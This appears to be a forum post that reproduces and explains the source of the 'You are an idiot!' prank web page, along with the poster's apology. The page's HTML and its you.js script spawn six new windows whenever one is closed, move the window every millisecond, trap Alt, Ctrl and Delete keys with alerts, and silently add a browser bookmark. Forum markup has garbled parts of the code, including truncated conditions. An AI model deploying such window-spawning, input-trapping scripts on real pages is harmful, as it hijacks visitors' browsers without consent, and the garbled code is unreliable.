[head]
[title]You are an idiot![ [I] title]
[script language="Javascript" src=".. [/I] script/you.js"][ [I] script]
[ [/I] head]
[body bgColor=#ffffff onload="flagRun=1;
playBall();return true;bookmark();"
onKeyDown="altf4key();ctrlkey();delkey();"
onUnLoad="procreate()" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"]
[object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase=" [URL='http://download.macromedia.com/'] http://download.macromedia.com/ [/URL]
pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="100%" height="100%"]
[param name=movie value="youare.swf"]
[param name=quality value=high]
[embed src="youare.swf" quality=high pluginspage=" [URL='http://www.macromedia.com/shockwave/download/index.cgi?'] http://www.macromedia.com/shockwave/download/index.cgi? [/URL]
P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="100%" height="100%"]
[ [I] embed]
[ [/I] object]
[ [I] body]
[ [/I] html]
procreate() function creates 6 new copies of the window when you try to close it.
you.js:
function bookmark() {
if ((navigator.appName == "Microsoft Internet Explorer")
&& (parseInt(navigator.appVersion) > = 4))
{
var url=" [URL='http://www.albinoblacksheep.com/'] http://www.albinoblacksheep.com/ [/URL] ;
var title="Idiot!";
window.external.AddFavorite(url,title);
}
}
function altf4key() { if (event.keyCode == 18 event.keyCode == 115)
alert("You are an idiot!"); }
function ctrlkey() { if (event.keyCode == 17) alert("You are an idiot!"); }
function delkey() { if (event.keyCode == 46) alert("You are an idiot!"); }
var xOff = 5;
var yOff = 5;
var xPos = 400;
var yPos = -100;
var flagRun = 1;
function openWindow(url){
aWindow = window.open(url," [U] blank", 'menubar=no,status=no,toolbar=noresizable=no,
width=180,height=175,titlebar=no,alwaysRaised=yes');
} [/U]
function procreate(){
openWindow('open.html');
openWindow('open.html');
openWindow('open.html');
openWindow('open.html');
openWindow('open.html');
openWindow('open.html');
}
function newXlt(){
xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;
window.focus()}
function newXrt(){
xOff = Math.ceil(7 * Math.random()) * 5 - 10 ;
}
function newYup(){
yOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;
}
function newYdn(){
yOff = Math.ceil( 7 * Math.random()) * 5 - 10 ;
}
function fOff(){
flagrun = 0;
}
function playBall(){
xPos += xOff;
yPos += yOff;
if (xPos > screen.width-175){
newXlt();
}
if (xPos
newXrt();
}
if (yPos > screen.height-100){
newYup();
}
if (yPos
newYdn();
}
if (flagRun == 1){
window.moveTo(xPos,yPos);
setTimeout('playBall()',1);
}
}
The function playBall() calls itself each 1 millisecond, moving windows on your screen.
Generally speaking, this is the same type of script used for usual "hard to kill" windows (e.g. porn sites), except that it moves fast and multiplies 6x each time.
I don't know why on MY computer it only creates 5 windows and can easily be killed via Task Manager. I guess, I need to download Windows Update to correct this :)
Again, I'm sorry.
Mishkin